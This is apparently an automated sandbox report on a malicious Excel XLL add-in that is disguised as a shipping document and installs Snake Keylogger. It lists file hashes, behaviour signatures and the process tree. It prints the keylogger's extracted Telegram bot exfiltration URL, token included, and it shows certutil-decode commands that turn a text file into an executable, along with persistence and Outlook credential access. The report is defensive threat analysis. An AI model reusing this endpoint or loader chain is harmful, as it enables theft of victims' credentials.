Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-07-2022 18:06
Static task
static1
Behavioral task
behavioral1
Sample
MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
Resource
win10v2004-20220414-en
General
-
Target
MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
-
Size
1.7MB
-
MD5
e772d046be7fbfbe96e90eca5ab20566
-
SHA1
286d9bcf13c0cb309f9041f2ea03e5ce99848669
-
SHA256
92c7146dd4dd24206b2c0b9dee831bdd772eced8b8d5c67b3b73e31bababea82
-
SHA512
4c79623f6c7c557169da85715e69f387ef2d98a16ab35516768ef921e65e791d1301d2574a6703b1e7c9fb6902d69bef341908294ba31469e57321533de70103
Malware Config
Extracted
Extracted
snakekeylogger
https://api.telegram.org/bot1707668650:AAFJBUcmT6aGlXwy3-beDARhm0ji930DCzM/sendMessage?chat_id=-772314354
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1188 3568 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3104 3568 cmd.exe EXCEL.EXE -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1600-167-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
appBQQRFLOQKX.txt.exepid process 1324 appBQQRFLOQKX.txt.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
appBQQRFLOQKX.txt.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation appBQQRFLOQKX.txt.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid process 3568 EXCEL.EXE 3568 EXCEL.EXE -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
appBQQRFLOQKX.txt.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rrfta = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hbxhwj\\Rrfta.exe\"" appBQQRFLOQKX.txt.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 35 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
appBQQRFLOQKX.txt.exedescription pid process target process PID 1324 set thread context of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3568 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeappBQQRFLOQKX.txt.exeInstallUtil.exepid process 3956 powershell.exe 3956 powershell.exe 1324 appBQQRFLOQKX.txt.exe 1324 appBQQRFLOQKX.txt.exe 1600 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
EXCEL.EXEappBQQRFLOQKX.txt.exepowershell.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 3568 EXCEL.EXE Token: SeDebugPrivilege 1324 appBQQRFLOQKX.txt.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 1600 InstallUtil.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.execmd.exeappBQQRFLOQKX.txt.exedescription pid process target process PID 3568 wrote to memory of 1188 3568 EXCEL.EXE cmd.exe PID 3568 wrote to memory of 1188 3568 EXCEL.EXE cmd.exe PID 1188 wrote to memory of 4016 1188 cmd.exe certutil.exe PID 1188 wrote to memory of 4016 1188 cmd.exe certutil.exe PID 3568 wrote to memory of 3104 3568 EXCEL.EXE cmd.exe PID 3568 wrote to memory of 3104 3568 EXCEL.EXE cmd.exe PID 3104 wrote to memory of 3056 3104 cmd.exe certutil.exe PID 3104 wrote to memory of 3056 3104 cmd.exe certutil.exe PID 3568 wrote to memory of 1324 3568 EXCEL.EXE appBQQRFLOQKX.txt.exe PID 3568 wrote to memory of 1324 3568 EXCEL.EXE appBQQRFLOQKX.txt.exe PID 3568 wrote to memory of 1324 3568 EXCEL.EXE appBQQRFLOQKX.txt.exe PID 1324 wrote to memory of 3956 1324 appBQQRFLOQKX.txt.exe powershell.exe PID 1324 wrote to memory of 3956 1324 appBQQRFLOQKX.txt.exe powershell.exe PID 1324 wrote to memory of 3956 1324 appBQQRFLOQKX.txt.exe powershell.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe PID 1324 wrote to memory of 1600 1324 appBQQRFLOQKX.txt.exe InstallUtil.exe -
outlook_office_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
outlook_win_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsx2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsx3⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe &2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe3⤵
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe"C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MV. NEW BRIDGE (EX THORCO SVENDBORG)..xllFilesize
1.7MB
MD5e772d046be7fbfbe96e90eca5ab20566
SHA1286d9bcf13c0cb309f9041f2ea03e5ce99848669
SHA25692c7146dd4dd24206b2c0b9dee831bdd772eced8b8d5c67b3b73e31bababea82
SHA5124c79623f6c7c557169da85715e69f387ef2d98a16ab35516768ef921e65e791d1301d2574a6703b1e7c9fb6902d69bef341908294ba31469e57321533de70103
-
C:\Users\Admin\AppData\Local\Temp\MV. NEW BRIDGE (EX THORCO SVENDBORG)..xllFilesize
1.7MB
MD5e772d046be7fbfbe96e90eca5ab20566
SHA1286d9bcf13c0cb309f9041f2ea03e5ce99848669
SHA25692c7146dd4dd24206b2c0b9dee831bdd772eced8b8d5c67b3b73e31bababea82
SHA5124c79623f6c7c557169da85715e69f387ef2d98a16ab35516768ef921e65e791d1301d2574a6703b1e7c9fb6902d69bef341908294ba31469e57321533de70103
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txtFilesize
24KB
MD5fbefbe8ae4a09ba8018b2d7ff9143f3e
SHA1c03cd7561d6a64f754c65bda8faa5a434eb04e0b
SHA256881a15d10e000d20b2179290d340e1234f46301569f19e34fe06f82f37cb32c8
SHA512490167845d6930e10339e83a5e60181e78a718b8975eccb6bb104467020b4fd4b080be20e463e5bfe681549e843999a2b90b3f48db737229e8a0bdc198af7189
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txtFilesize
58B
MD5759d88148f2999ed1b1db44c9b1be24d
SHA16a427759e0dfb9ebc2826a239dd3c7ffb2d39a36
SHA25622a3bb08dd922fa426a32104fb211b5b6897f286913f74e349c55dcec45e307c
SHA5120b3c1cbc98c7f6839b7654f80037e5efd0ea06a62ef3afb52423d27cd283aee4b844befed5fb0f1f65f89fe472a455a255f911e9a296206758e53666fdd5d852
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exeFilesize
174KB
MD529e69c25d02c5a45e62f038f7aa7a716
SHA19aa09cd4c4126cd410a2674a37d34d1d7575d8b0
SHA256cb191c1c612b01447bd75c880c223fa73c82f9902bc6e6a26881031b0a9bf9db
SHA512b626b753d4e9daf4ab42e0fe00213600a12874822703c7d7c9fb6a2c8548885ad6f30b341c317780146ac5c7dacf11331071cc721c0cc9a411c4386dc6ee00e9
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exeFilesize
174KB
MD529e69c25d02c5a45e62f038f7aa7a716
SHA19aa09cd4c4126cd410a2674a37d34d1d7575d8b0
SHA256cb191c1c612b01447bd75c880c223fa73c82f9902bc6e6a26881031b0a9bf9db
SHA512b626b753d4e9daf4ab42e0fe00213600a12874822703c7d7c9fb6a2c8548885ad6f30b341c317780146ac5c7dacf11331071cc721c0cc9a411c4386dc6ee00e9
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsxFilesize
18KB
MD5aea065e068a1c885c5c82b9da16de628
SHA1f6c1af23d9e30b77160bf0da4f56eaef94d853c1
SHA256fcd49a887692286cd815e911fd667f9323152c4d13e37020f065aabd023ab0ca
SHA512092247866bca90694c95e7d1db658baba7fd88c192fd8e2c132de896541b3a09b74b17055022dbb03789814a0a31c3ae57072e6ef6f3c88f2cd23c0ca8275c8a
-
memory/1188-141-0x0000000000000000-mapping.dmp
-
memory/1324-165-0x000000002FD70000-0x000000002FE02000-memory.dmpFilesize
584KB
-
memory/1324-150-0x0000000000000000-mapping.dmp
-
memory/1324-153-0x0000000000EA0000-0x0000000000ED2000-memory.dmpFilesize
200KB
-
memory/1600-166-0x0000000000000000-mapping.dmp
-
memory/1600-167-0x0000000000400000-0x0000000000426000-memory.dmpFilesize
152KB
-
memory/1600-168-0x0000000004E20000-0x00000000053C4000-memory.dmpFilesize
5.6MB
-
memory/1600-169-0x0000000004910000-0x00000000049AC000-memory.dmpFilesize
624KB
-
memory/1600-170-0x00000000059A0000-0x0000000005B62000-memory.dmpFilesize
1.8MB
-
memory/1600-171-0x0000000005910000-0x000000000591A000-memory.dmpFilesize
40KB
-
memory/3056-148-0x0000000000000000-mapping.dmp
-
memory/3104-147-0x0000000000000000-mapping.dmp
-
memory/3568-164-0x0000014E1DC5C000-0x0000014E1DC5F000-memory.dmpFilesize
12KB
-
memory/3568-133-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-144-0x00007FF8E85F0000-0x00007FF8E90B1000-memory.dmpFilesize
10.8MB
-
memory/3568-177-0x00007FF8E85F0000-0x00007FF8E90B1000-memory.dmpFilesize
10.8MB
-
memory/3568-176-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-175-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-174-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-173-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-131-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-132-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-146-0x0000014E1DC5C000-0x0000014E1DC5F000-memory.dmpFilesize
12KB
-
memory/3568-134-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-135-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmpFilesize
64KB
-
memory/3568-163-0x00007FF8E85F0000-0x00007FF8E90B1000-memory.dmpFilesize
10.8MB
-
memory/3568-130-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/3568-138-0x0000014E05560000-0x0000014E05733000-memory.dmpFilesize
1.8MB
-
memory/3568-136-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmpFilesize
64KB
-
memory/3956-162-0x0000000006AB0000-0x0000000006ACA000-memory.dmpFilesize
104KB
-
memory/3956-161-0x0000000007C00000-0x000000000827A000-memory.dmpFilesize
6.5MB
-
memory/3956-160-0x00000000065B0000-0x00000000065CE000-memory.dmpFilesize
120KB
-
memory/3956-159-0x0000000005EA0000-0x0000000005F06000-memory.dmpFilesize
408KB
-
memory/3956-158-0x0000000005D30000-0x0000000005D96000-memory.dmpFilesize
408KB
-
memory/3956-157-0x0000000005600000-0x0000000005622000-memory.dmpFilesize
136KB
-
memory/3956-156-0x0000000005690000-0x0000000005CB8000-memory.dmpFilesize
6.2MB
-
memory/3956-155-0x0000000004FF0000-0x0000000005026000-memory.dmpFilesize
216KB
-
memory/3956-154-0x0000000000000000-mapping.dmp
-
memory/4016-142-0x0000000000000000-mapping.dmp